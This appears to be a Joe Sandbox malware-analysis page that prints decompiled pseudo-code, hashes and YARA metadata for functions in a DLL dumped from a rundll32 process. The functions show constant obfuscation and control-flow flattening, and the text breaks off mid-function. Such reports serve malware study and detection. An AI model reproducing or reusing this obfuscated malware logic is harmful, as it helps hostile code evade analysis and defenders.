Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5?$?Ja$@o$c_$x
API String ID: 0-4250105947
Opcode ID: 2c217d48533dad8873ef5dc10d46fd82e33d650e3b6e3cf6e6449b31b002857f
Instruction ID: efb3cb8cad86ced703032cac9bca444b85d94783e820ac94703e853f68829d03
Opcode Fuzzy Hash: 2c217d48533dad8873ef5dc10d46fd82e33d650e3b6e3cf6e6449b31b002857f
Instruction Fuzzy Hash: 72511171D0121DEBDF49CFE0D98AAEEBBB1FB04318F208059E511762A4C7B95A58CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001E4E1, Relevance: 6.3, Strings: 5, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001E4E1(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t108;
				signed int _t118;
				intOrPtr _t126;

				_v12 = 0x3feb;
				_v12 = _v12 ^ 0xcdd1ce3b;
				_v12 = _v12 >> 5;
				_t118 = 0x60;
				_t126 = _a4;
				_v12 = _v12 * 0x7b;
				_v12 = _v12 ^ 0x171ee569;
				_v24 = 0x2dab;
				_v24 = _v24 + 0x955c;
				_v24 = _v24 + 0x73c2;
				_v24 = _v24 ^ 0x00013ede;
				_v8 = 0x605b;
				_v8 = _v8 ^ 0xad75f528;
				_v8 = _v8 / _t118;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xe8ee653f;
				_v20 = 0x2d14;
				_v20 = _v20 + 0xe318;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00002d9c;
				_v44 = 0x2077;
				_v44 = _v44 | 0x5bdff4a3;
				_v44 = _v44 ^ 0x5bdfc06c;
				_v16 = 0x8df4;
				_v16 = _v16 + 0xffffe14c;
				_v16 = _v16 + 0x44aa;
				_v16 = _v16 | 0xd9201f97;
				_v16 = _v16 ^ 0xd920f3e0;
				_v40 = 0x6c47;
				_v40 = _v40 | 0xeaddf716;
				_v40 = _v40 ^ 0xeaddcac6;
				_v36 = 0xb0d9;
				_v36 = _v36 | 0xa5fee9f0;
				_v36 = _v36 + 0x94a7;
				_v36 = _v36 ^ 0xa5ffe14d;
				_v48 = 0xa745;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x000022dd;
				_v32 = 0x5fea;
				_v32 = _v32 | 0x4aa6f422;
				_v32 = _v32 ^ 0x892ddeba;
				_v32 = _v32 ^ 0xc38b6a4e;
				_v28 = 0xcc2f;
				_v28 = _v28 ^ 0xf75f73c4;
				_v28 = _v28 | 0x52469363;
				_v28 = _v28 ^ 0xf75fa326;
				_t108 =  *((intOrPtr*)(_t126 + 4))( *((intOrPtr*)(_t126 + 0x18)), 1, 0);
				_t131 = _t108;
				if(_t108 != 0) {
					_t87 =  &_v8; // 0xe8ee653f
					E1001DA27(_v12,  &_v124, _v24,  *_t87, _v20);
					_v60 =  &_v124;
					_v56 = E10008CF3(_v44, _v16, _t131, _t118,  &_v52);
					 *((intOrPtr*)(_t126 + 4))( *((intOrPtr*)(_t126 + 0x18)), 0xa,  &_v60, _v40);
					E1000717B(_v36, _v48, _v32, _v56, _v28);
				}
				return 0;
			}

0x1001e4e7
0x1001e4f0
0x1001e4f7
0x1001e502
0x1001e503
0x1001e506
0x1001e509
0x1001e510
0x1001e517
0x1001e51e
0x1001e525
0x1001e52c
0x1001e533
0x1001e541
0x1001e544
0x1001e548
0x1001e54f
0x1001e556
0x1001e55d
0x1001e561
0x1001e568
0x1001e56f
0x1001e576
0x1001e57d
0x1001e584
0x1001e58b
0x1001e592
0x1001e599
0x1001e5a0
0x1001e5a7
0x1001e5ae
0x1001e5b5
0x1001e5bc
0x1001e5c3
0x1001e5ca
0x1001e5d1
0x1001e5d8
0x1001e5db
0x1001e5e2
0x1001e5e9
0x1001e5f0
0x1001e5f7
0x1001e5fe
0x1001e605
0x1001e60c
0x1001e613
0x1001e61f
0x1001e622
0x1001e624
0x1001e62c
0x1001e636
0x1001e641
0x1001e65a
0x1001e666
0x1001e678
0x1001e67d
0x1001e686

Strings

?e, xrefs: 1001E53A
?, xrefs: 1001E4E7
Gl, xrefs: 1001E5A0
_, xrefs: 1001E5E2
w , xrefs: 1001E568

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ?e$Gl$w $?$_
API String ID: 0-1446513408
Opcode ID: b1f33b02b3c19594a660f9c01347cd1a977885be0c323f8fab719329a1c47fb8
Instruction ID: b40dadb2f29b55526b1d7279ff976d5804ae390a33e4c3c08d81ad2cb77b3f99
Opcode Fuzzy Hash: b1f33b02b3c19594a660f9c01347cd1a977885be0c323f8fab719329a1c47fb8
Instruction Fuzzy Hash: 5B41FF72D0020DABEF54CFE1D94A8EEBFB1FB08314F208159D512B62A4D3B95A49CF95

Uniqueness

Uniqueness Score: -1.00%

Function 10019D6D, Relevance: 6.3, Strings: 5, Instructions: 93
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10019D6D(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t84;
				void* _t90;
				void* _t91;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t104;
				void* _t105;
				signed int* _t107;

				_t107 =  &_v32;
				_v16 = 0x1c0b;
				_v16 = _v16 | 0x78fbf915;
				_t91 = __ecx;
				_t104 = 0;
				_t93 = 0x68;
				_v16 = _v16 / _t93;
				_v16 = _v16 ^ 0x0129c40a;
				_t105 = 0x32e75de0;
				_v20 = 0x2d02;
				_t94 = 0x2d;
				_v20 = _v20 / _t94;
				_v20 = _v20 + 0xffff38ef;
				_v20 = _v20 ^ 0xffff4858;
				_v24 = 0x7ce9;
				_v24 = _v24 << 0xb;
				_t95 = 0x5e;
				_v24 = _v24 / _t95;
				_v24 = _v24 ^ 0x000ad424;
				_v32 = 0xdbb4;
				_v32 = _v32 + 0xa6a9;
				_v32 = _v32 >> 8;
				_v32 = _v32 ^ 0x262cd2c5;
				_v32 = _v32 ^ 0x262cc0c8;
				_v28 = 0x8a25;
				_v28 = _v28 ^ 0xc6feba07;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0f353d64;
				_v4 = 0xb314;
				_v4 = _v4 >> 3;
				_v4 = _v4 ^ 0x00005c81;
				_v8 = 0x8336;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x0000433b;
				_v12 = 0x256f;
				_v12 = _v12 ^ 0x4c59f7e4;
				_v12 = _v12 ^ 0x4c59cc97;
				do {
					while(_t105 != 0x1de83d5c) {
						if(_t105 == 0x32e75de0) {
							_t105 = 0x355f9106;
							continue;
						} else {
							if(_t105 == 0x355f9106) {
								_t90 = E1001814A();
								_t107 = _t107 - 0xc + 0xc;
								_t105 = 0x1de83d5c;
								_t104 = _t104 + _t90;
								continue;
							}
						}
						goto L7;
					}
					_t84 = E100116E3(_v28, _v4, _v8, _t91 + 4, _v12);
					_t107 =  &(_t107[3]);
					_t105 = 0x20f86cc5;
					_t104 = _t104 + _t84;
					L7:
				} while (_t105 != 0x20f86cc5);
				return _t104;
			}

0x10019d6d
0x10019d70
0x10019d7a
0x10019d8c
0x10019d8e
0x10019d90
0x10019d95
0x10019d9b
0x10019da3
0x10019da8
0x10019db9
0x10019dbe
0x10019dc4
0x10019dcc
0x10019dd4
0x10019ddc
0x10019de5
0x10019de8
0x10019dec
0x10019df4
0x10019dfc
0x10019e04
0x10019e09
0x10019e11
0x10019e19
0x10019e21
0x10019e2e
0x10019e32
0x10019e37
0x10019e3f
0x10019e47
0x10019e4c
0x10019e54
0x10019e5c
0x10019e61
0x10019e69
0x10019e71
0x10019e79
0x10019e81
0x10019e81
0x10019e8f
0x10019eb9
0x00000000
0x10019e91
0x10019e93
0x10019ea8
0x10019ead
0x10019eb0
0x10019eb5
0x00000000
0x10019eb5
0x10019e93
0x00000000
0x10019e8f
0x10019ed1
0x10019ed6
0x10019ed9
0x10019ede
0x10019ee0
0x10019ee0
0x10019ef1

Strings

o%, xrefs: 10019E69
]2, xrefs: 10019DA3
]2, xrefs: 10019E89
|, xrefs: 10019DD4
;C, xrefs: 10019E61

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;C$o%$]2$]2$|
API String ID: 0-4053395349
Opcode ID: 06c3ae6766c3862e80847a3f5f850226f9bc4fcf48f9e7f7670e8bac13bbd3b4
Instruction ID: 04245b9a2177e7b7901b2a162a2189fb18972f5a9a82363eaa65a0f94a14a127
Opcode Fuzzy Hash: 06c3ae6766c3862e80847a3f5f850226f9bc4fcf48f9e7f7670e8bac13bbd3b4
Instruction Fuzzy Hash: 454136729083428BD308CE25D94A40BBBE1FBD8758F154A1DF899AB260C375DA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 1001E0B6, Relevance: 5.2, Strings: 4, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1001E0B6() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				void* _t228;
				void* _t231;
				intOrPtr _t236;
				void* _t241;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int* _t272;

				_t272 =  &_v1652;
				_v1588 = 0x8466;
				_v1588 = _v1588 | 0xe5298376;
				_t241 = 0x1d7fe1f8;
				_v1588 = _v1588 ^ 0xe529875f;
				_v1604 = 0xb0;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 + 0xffff4e87;
				_v1604 = _v1604 ^ 0x0057481f;
				_v1572 = 0xc406;
				_v1572 = _v1572 + 0xffff27cd;
				_v1572 = _v1572 ^ 0xfffffcf4;
				_v1620 = 0xb299;
				_t265 = 0x27;
				_v1620 = _v1620 / _t265;
				_v1620 = _v1620 >> 5;
				_t264 = 0;
				_v1620 = _v1620 ^ 0x00003dc9;
				_v1632 = 0x6535;
				_v1632 = _v1632 >> 0xc;
				_v1632 = _v1632 << 2;
				_v1632 = _v1632 << 0xc;
				_v1632 = _v1632 ^ 0x0001c9a8;
				_v1612 = 0xe5a6;
				_t266 = 0x6d;
				_v1612 = _v1612 * 0x16;
				_v1612 = _v1612 << 0xd;
				_v1612 = _v1612 ^ 0x7788f2ad;
				_v1628 = 0xc1fc;
				_v1628 = _v1628 >> 3;
				_v1628 = _v1628 ^ 0x13bd71e6;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 ^ 0xd69dc9d9;
				_v1644 = 0x8af4;
				_v1644 = _v1644 / _t266;
				_v1644 = _v1644 | 0xd37883ad;
				_v1644 = _v1644 + 0x944d;
				_v1644 = _v1644 ^ 0xd379692d;
				_v1636 = 0xacbf;
				_t267 = 0x71;
				_v1636 = _v1636 / _t267;
				_v1636 = _v1636 ^ 0xb5f1e6e5;
				_v1636 = _v1636 ^ 0x144b26c0;
				_v1636 = _v1636 ^ 0xa1ba9db2;
				_v1568 = 0x659b;
				_v1568 = _v1568 << 9;
				_v1568 = _v1568 ^ 0x00cb2c0e;
				_v1592 = 0x1cc;
				_v1592 = _v1592 ^ 0x8d0228b7;
				_v1592 = _v1592 ^ 0x8d020556;
				_v1600 = 0x3727;
				_v1600 = _v1600 * 0x50;
				_v1600 = _v1600 ^ 0x924d3540;
				_v1600 = _v1600 ^ 0x925c176a;
				_v1564 = 0xda5a;
				_v1564 = _v1564 | 0x46b849d3;
				_v1564 = _v1564 ^ 0x46b8c5d1;
				_v1580 = 0x9382;
				_v1580 = _v1580 << 8;
				_v1580 = _v1580 ^ 0x0093cfd4;
				_v1652 = 0x9158;
				_v1652 = _v1652 + 0xb4de;
				_t268 = 7;
				_v1652 = _v1652 / _t268;
				_t269 = 0x22;
				_v1652 = _v1652 * 0x6e;
				_v1652 = _v1652 ^ 0x001435a3;
				_v1616 = 0x71dc;
				_v1616 = _v1616 / _t269;
				_v1616 = _v1616 ^ 0x15ceab8f;
				_v1616 = _v1616 ^ 0x15cea909;
				_v1608 = 0xb75f;
				_v1608 = _v1608 + 0xe212;
				_v1608 = _v1608 | 0xd283d472;
				_v1608 = _v1608 ^ 0xd283a5c0;
				_v1640 = 0x35d3;
				_v1640 = _v1640 + 0xffffaad5;
				_v1640 = _v1640 * 0x2c;
				_v1640 = _v1640 + 0x3956;
				_v1640 = _v1640 ^ 0xfffa84b0;
				_v1648 = 0xdcac;
				_v1648 = _v1648 ^ 0x974ba97e;
				_v1648 = _v1648 << 0xc;
				_v1648 = _v1648 ^ 0xe039c8f5;
				_v1648 = _v1648 ^ 0x5764fade;
				_v1596 = 0xcfdb;
				_v1596 = _v1596 ^ 0x22395a46;
				_v1596 = _v1596 | 0x2e786fe0;
				_v1596 = _v1596 ^ 0x2e79aa1c;
				_v1576 = 0x9ce5;
				_v1576 = _v1576 + 0xfffff548;
				_v1576 = _v1576 ^ 0x0000db35;
				_v1624 = 0xaf83;
				_v1624 = _v1624 + 0x4295;
				_v1624 = _v1624 | 0xa546c831;
				_v1624 = _v1624 ^ 0x9f0c0e83;
				_v1624 = _v1624 ^ 0x3a4acdb1;
				_v1584 = 0x109f;
				_v1584 = _v1584 ^ 0x8f540e39;
				_v1584 = _v1584 ^ 0x8f540fad;
				do {
					while(_t241 != 0x199129c3) {
						if(_t241 == 0x1d7fe1f8) {
							E1001BA7B(_v1588, _t241, _v1604, _v1572, _t241,  &_v1040, _v1620, _v1632);
							_t272 =  &(_t272[7]);
							_t241 = 0x1f1bbc0e;
							continue;
						} else {
							_t276 = _t241 - 0x1f1bbc0e;
							if(_t241 == 0x1f1bbc0e) {
								_push(_v1636);
								_push(_v1644);
								_push(_v1628);
								_t231 = E1000B871(0x10001594, _v1612, _t276);
								E1001D87D( &_v1560, _t276);
								_t236 =  *0x10021fd8; // 0x0
								_t196 = _t236 + 0x1c; // 0x1c
								E10011E0D(_t196, _t276,  &_v1560, _v1568, _v1592,  &_v520, _t231, _v1600, 0x104,  &_v1040, _v1564, _v1580, _v1652);
								E1000717B(_v1616, _v1608, _v1640, _t231, _v1648);
								_t272 =  &(_t272[0x11]);
								_t241 = 0x199129c3;
								continue;
							}
						}
						goto L7;
					}
					_push(_v1584);
					_push(0);
					_push(_t241);
					_push(_v1624);
					_push(_v1576);
					_push( &_v520);
					_push(0);
					_t228 = E1001B0D5(0, _v1596, __eflags);
					_t272 =  &(_t272[7]);
					__eflags = _t228;
					_t264 =  !=  ? 1 : _t264;
					_t241 = 0x2ba47825;
					L7:
					__eflags = _t241 - 0x2ba47825;
				} while (__eflags != 0);
				return _t264;
			}

0x1001e0b6
0x1001e0bc
0x1001e0c6
0x1001e0ce
0x1001e0d3
0x1001e0db
0x1001e0e3
0x1001e0e8
0x1001e0f0
0x1001e0f8
0x1001e100
0x1001e108
0x1001e110
0x1001e122
0x1001e127
0x1001e12d
0x1001e132
0x1001e134
0x1001e13c
0x1001e144
0x1001e149
0x1001e14e
0x1001e153
0x1001e15b
0x1001e168
0x1001e16b
0x1001e16f
0x1001e174
0x1001e17c
0x1001e184
0x1001e189
0x1001e191
0x1001e196
0x1001e19e
0x1001e1ae
0x1001e1b2
0x1001e1ba
0x1001e1c2
0x1001e1ca
0x1001e1d6
0x1001e1d9
0x1001e1dd
0x1001e1e5
0x1001e1ed
0x1001e1f5
0x1001e1fd
0x1001e202
0x1001e20a
0x1001e212
0x1001e21a
0x1001e222
0x1001e22f
0x1001e233
0x1001e23b
0x1001e243
0x1001e24b
0x1001e253
0x1001e25b
0x1001e263
0x1001e268
0x1001e270
0x1001e278
0x1001e288
0x1001e28d
0x1001e29d
0x1001e2a3
0x1001e2a7
0x1001e2af
0x1001e2bd
0x1001e2c1
0x1001e2c9
0x1001e2d1
0x1001e2d9
0x1001e2e1
0x1001e2e9
0x1001e2f1
0x1001e2f9
0x1001e306
0x1001e30a
0x1001e312
0x1001e31a
0x1001e322
0x1001e32a
0x1001e32f
0x1001e337
0x1001e33f
0x1001e347
0x1001e34f
0x1001e357
0x1001e35f
0x1001e367
0x1001e36f
0x1001e377
0x1001e37f
0x1001e387
0x1001e38f
0x1001e397
0x1001e39f
0x1001e3a7
0x1001e3af
0x1001e3b7
0x1001e3b7
0x1001e3c9
0x1001e48c
0x1001e491
0x1001e494
0x00000000
0x1001e3cf
0x1001e3cf
0x1001e3d1
0x1001e3d7
0x1001e3e0
0x1001e3e4
0x1001e3ec
0x1001e3f7
0x1001e435
0x1001e43a
0x1001e443
0x1001e45c
0x1001e461
0x1001e464
0x00000000
0x1001e464
0x1001e3d1
0x00000000
0x1001e3c9
0x1001e49b
0x1001e4a6
0x1001e4a8
0x1001e4a9
0x1001e4af
0x1001e4b7
0x1001e4b8
0x1001e4ba
0x1001e4c1
0x1001e4c5
0x1001e4c7
0x1001e4ca
0x1001e4cc
0x1001e4cc
0x1001e4cc
0x1001e4e0

Strings

V9, xrefs: 1001E30A
ox., xrefs: 1001E34F
5e, xrefs: 1001E13C
'7, xrefs: 1001E222

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '7$5e$V9$ox.
API String ID: 0-3496647276
Opcode ID: 06ef948ae984d92213fdf8dd1009dd8ecbb4b38a8813d681a5e28c7f94da8f63
Instruction ID: a253e34c3d596580d1c2d6114f65c4f36327f56b28f2d1c8b3682a1783138d12
Opcode Fuzzy Hash: 06ef948ae984d92213fdf8dd1009dd8ecbb4b38a8813d681a5e28c7f94da8f63
Instruction Fuzzy Hash: DEA1F0711083819FE758CF65C58994FBBF1FB84758F408A1DF1A69A2A0D3B5CA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1001505A, Relevance: 5.2, Strings: 4, Instructions: 175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001505A(intOrPtr* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* __ecx;
				void* _t152;
				void* _t168;
				signed int _t179;
				signed int _t180;
				void* _t183;
				intOrPtr* _t199;
				signed int* _t200;
				signed int* _t203;

				_t200 = _a8;
				_push(_t200);
				_push(_a4);
				_t199 = __edx;
				_push(__edx);
				E10017B8C(_t152);
				_v116 = 0x4468;
				_t203 =  &(( &_v140)[4]);
				_v116 = _v116 + 0x4d0d;
				_t183 = 0x128a868f;
				_t180 = 0x13;
				_v116 = _v116 * 0x59;
				_v116 = _v116 ^ 0x0032f51b;
				_v132 = 0xadd9;
				_v132 = _v132 * 7;
				_v132 = _v132 + 0x96a7;
				_v132 = _v132 + 0xffff8f96;
				_v132 = _v132 ^ 0x0004c6ea;
				_v96 = 0x9934;
				_v96 = _v96 + 0x4ba1;
				_v96 = _v96 | 0x5084cad7;
				_v96 = _v96 ^ 0x5084f775;
				_v92 = 0x26f7;
				_v92 = _v92 << 0xd;
				_v92 = _v92 + 0xf554;
				_v92 = _v92 ^ 0x04dfffa0;
				_v112 = 0xbc07;
				_v112 = _v112 << 0xe;
				_v112 = _v112 + 0x8c0d;
				_v112 = _v112 ^ 0x2f024328;
				_v104 = 0x5c5b;
				_v104 = _v104 >> 9;
				_v104 = _v104 << 1;
				_v104 = _v104 ^ 0x00003230;
				_v84 = 0x168f;
				_v84 = _v84 * 0x35;
				_v84 = _v84 ^ 0x0004a19f;
				_v140 = 0x7462;
				_v140 = _v140 >> 2;
				_v140 = _v140 ^ 0x4b21630d;
				_v140 = _v140 << 6;
				_v140 = _v140 ^ 0xc85fd9e8;
				_v120 = 0x70d5;
				_v120 = _v120 * 0x79;
				_v120 = _v120 >> 8;
				_v120 = _v120 ^ 0x000039dd;
				_v88 = 0x12a0;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0x87bd;
				_v88 = _v88 ^ 0x0000da6f;
				_v128 = 0xb4d2;
				_v128 = _v128 >> 0xd;
				_v128 = _v128 * 0x47;
				_v128 = _v128 ^ 0x00007cd2;
				_v100 = 0x721f;
				_v100 = _v100 + 0xf1ab;
				_v100 = _v100 + 0x8e50;
				_v100 = _v100 ^ 0x0001a8ac;
				_v124 = 0x86fe;
				_v124 = _v124 + 0xffff36ec;
				_v124 = _v124 * 0x7e;
				_v124 = _v124 + 0xa049;
				_v124 = _v124 ^ 0xffe074b8;
				_v136 = 0x690e;
				_v136 = _v136 + 0xffff8490;
				_v136 = _v136 / _t180;
				_v136 = _v136 >> 1;
				_v136 = _v136 ^ 0x06bca133;
				_v108 = 0xab2e;
				_v108 = _v108 << 8;
				_v108 = _v108 + 0xb6cb;
				_v108 = _v108 ^ 0x00abe0cb;
				_v80 = 0x18c9;
				_v80 = _v80 + 0xa2b4;
				_v80 = _v80 ^ 0x0000b37d;
				while(_t183 != 0x6f89eb6) {
					if(_t183 == 0xd060549) {
						_t197 = _v84;
						E1001BC32( &_v76, _v84, _t200, _v140, _v120);
						_t203 =  &(_t203[3]);
						_t183 = 0xfa36bad;
						continue;
					} else {
						if(_t183 == 0xfa36bad) {
							_t197 =  *_t199;
							E1001160B(_v88,  *_t199, _v128,  &_v76);
							_t203 =  &(_t203[2]);
							_t183 = 0x182d6683;
							continue;
						} else {
							if(_t183 == 0x128a868f) {
								_t183 = 0x6f89eb6;
								 *_t200 =  *_t200 & 0x00000000;
								_t200[1] = _v136;
								continue;
							} else {
								if(_t183 == 0x182d6683) {
									E1001894D( &_v76, _v100, __eflags, _v124, _t199 + 4);
								} else {
									if(_t183 != 0x2480bd93) {
										L13:
										__eflags = _t183 - 0x44906e3;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t183);
										_t179 = E1000A0AD(_t200[1], _t197);
										 *_t200 = _t179;
										if(_t179 != 0) {
											_t183 = 0xd060549;
											continue;
										}
									}
								}
							}
						}
					}
					__eflags =  *_t200;
					_t151 =  *_t200 != 0;
					__eflags = _t151;
					return 0 | _t151;
				}
				_t200[1] = E10019D6D(_t199);
				_t168 = E100180F6(_v80, _v108, __eflags);
				_t203 = _t203 - 0x10 + 0x10;
				_t183 = 0x2480bd93;
				_t144 =  &(_t200[1]);
				 *_t144 = _t200[1] + _t168;
				__eflags =  *_t144;
				goto L13;
			}

0x10015063
0x1001506b
0x1001506c
0x10015073
0x10015075
0x10015077
0x1001507c
0x10015084
0x10015087
0x1001508f
0x1001509b
0x1001509c
0x100150a0
0x100150a8
0x100150b5
0x100150b9
0x100150c1
0x100150c9
0x100150d1
0x100150d9
0x100150e1
0x100150e9
0x100150f1
0x100150f9
0x100150fe
0x10015106
0x1001510e
0x10015116
0x1001511b
0x10015123
0x1001512b
0x10015133
0x10015138
0x1001513c
0x10015144
0x10015151
0x10015155
0x1001515d
0x10015165
0x1001516a
0x10015172
0x10015177
0x1001517f
0x1001518c
0x10015190
0x10015195
0x1001519d
0x100151a5
0x100151aa
0x100151b2
0x100151ba
0x100151ca
0x100151d4
0x100151d8
0x100151e0
0x100151e8
0x100151f0
0x100151f8
0x10015200
0x10015208
0x10015215
0x10015219
0x10015221
0x10015229
0x10015231
0x1001524b
0x1001524f
0x10015253
0x1001525b
0x10015263
0x10015268
0x10015270
0x10015278
0x10015280
0x10015288
0x10015290
0x1001529a
0x1001531c
0x10015321
0x10015326
0x10015329
0x00000000
0x1001529c
0x100152a2
0x100152fb
0x10015301
0x10015306
0x10015309
0x00000000
0x100152a4
0x100152aa
0x100152e8
0x100152ea
0x100152ed
0x00000000
0x100152ac
0x100152b2
0x10015386
0x100152b8
0x100152be
0x10015368
0x10015368
0x1001536e
0x00000000
0x00000000
0x10015374
0x100152c4
0x100152cc
0x100152d0
0x100152d5
0x100152da
0x100152e0
0x00000000
0x100152e0
0x100152da
0x100152be
0x100152b2
0x100152aa
0x100152a2
0x1001538f
0x10015394
0x10015394
0x1001539e
0x1001539e
0x1001533a
0x10015358
0x1001535d
0x10015360
0x10015365
0x10015365
0x10015365
0x00000000

Strings

M, xrefs: 10015087
02, xrefs: 1001513C
hD, xrefs: 1001507C
c!K, xrefs: 1001516A

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: M$c!K$02$hD
API String ID: 0-3086900411
Opcode ID: c5e1dac38949899f44cdd6c68e2c6c59be49bcae53d5fb46c62309e07114ce41
Instruction ID: 6736eda00f552586e346cbc9880d0de9ce1cf4a0f6e23e19be34433d2243d5ba
Opcode Fuzzy Hash: c5e1dac38949899f44cdd6c68e2c6c59be49bcae53d5fb46c62309e07114ce41
Instruction Fuzzy Hash: 16811FB15083419FD354CF24C58941FBBE0FB85758F504A1DF5969A2A0D3BADA88CF93

Uniqueness

Uniqueness Score: -1.00%

Function 1001C92D, Relevance: 5.1, Strings: 4, Instructions: 133
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1001C92D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t111;
				void* _t123;
				void* _t133;
				void* _t135;
				signed int _t137;
				signed int _t138;
				void* _t156;
				void* _t161;
				intOrPtr* _t163;
				signed int* _t165;
				signed int* _t166;
				signed int* _t167;

				_t163 = _a12;
				_push(0);
				_push(_t163);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t111);
				_v36 = 0xcdb1;
				_v36 = _v36 ^ 0xa07f0d49;
				_v36 = _v36 >> 1;
				_v36 = _v36 ^ 0x503ff07c;
				_v40 = 0x3378;
				_t137 = 0x49;
				_v40 = _v40 * 0x2b;
				_v40 = _v40 / _t137;
				_v40 = _v40 ^ 0x00003e51;
				_v16 = 0xb5d6;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x2d7587ab;
				_v20 = 0xc892;
				_v20 = _v20 | 0xf75fa36b;
				_v20 = _v20 ^ 0xf75fb6fd;
				_v44 = 0x4f15;
				_v44 = _v44 << 0x10;
				_v44 = _v44 ^ 0x5ced66f0;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000144ab;
				_v48 = 0x5a14;
				_t138 = 0x2b;
				_v48 = _v48 * 0x13;
				_v48 = _v48 * 0x17;
				_v48 = _v48 + 0xffff939c;
				_v48 = _v48 ^ 0x0099650b;
				_v32 = 0x9af9;
				_v32 = _v32 + 0xffff05eb;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0xfffd6599;
				_v8 = 0xcc4b;
				_v8 = _v8 * 0x14;
				_v8 = _v8 ^ 0x000fbf1a;
				_v28 = 0xe459;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 * 0x27;
				_v28 = _v28 ^ 0x000048ba;
				_v24 = 0xa5ba;
				_v24 = _v24 >> 7;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0x00a5cec9;
				_v4 = 0x957;
				_t139 = _t163;
				_v4 = _v4 / _t138;
				_v4 = _v4 ^ 0x0000394e;
				_v12 = 0x7088;
				_v12 = _v12 * 0x1b;
				_v12 = _v12 ^ 0x000bde18;
				_t123 = E10013861(_t163, _v16, _v20);
				_t133 = _t123;
				_t165 =  &(( &_v48)[7]);
				if(_t133 != 0) {
					_t156 = E1001ED0B(_v44, _v48, _v12, _v32, _t139, _v40 | _v36,  *((intOrPtr*)(_t133 + 0x50)));
					_t166 =  &(_t165[5]);
					if(_t156 == 0) {
						L6:
						return _t156;
					}
					E1000E2FD(_t156, _v8,  *((intOrPtr*)(_t133 + 0x54)), _v28,  *_t163);
					_t167 =  &(_t166[3]);
					_t161 = ( *(_t133 + 0x14) & 0x0000ffff) + 0x18 + _t133;
